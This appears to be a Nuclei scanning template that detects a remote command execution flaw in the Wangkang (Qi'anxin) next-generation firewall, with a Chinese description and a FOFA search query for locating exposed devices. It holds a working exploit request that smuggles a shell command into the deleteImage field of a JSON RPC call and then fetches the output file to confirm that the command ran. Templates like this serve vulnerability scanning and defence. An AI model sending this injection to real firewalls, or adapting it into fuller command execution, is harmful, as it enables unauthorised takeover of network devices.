id: WangKang-NGFW-RCE

info:
  name: 网康科技-下一代防火墙存在任意命令执行漏洞
  author: changge
  severity: critical
  description: 奇安信网康下一代防火墙（NGFW）是网康科技推出的一款可全面应对网络威胁的高性能应用层防火墙，存在远程命令执行，通过漏洞攻击者可以获取服务器权限。
  metadata:
    max-request: 1
    fofa-query: body="app/feature/portForwarding.js" || body="app/app.translate-config.js"
    verified: true
variables:
  file_name: "{{to_lower(rand_text_alpha(6))}}.txt"
requests:
  - raw:
      - |-
        POST /directdata/direct/router HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
        Host: {{Hostname}}

        {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;id >/var/www/html/{{file_name}}"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

      - |+
        GET /{{file_name}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

    matchers:
      - type: dsl
        dsl:
          - 'contains((body_2), "uid") && status_code_2 == 200' 
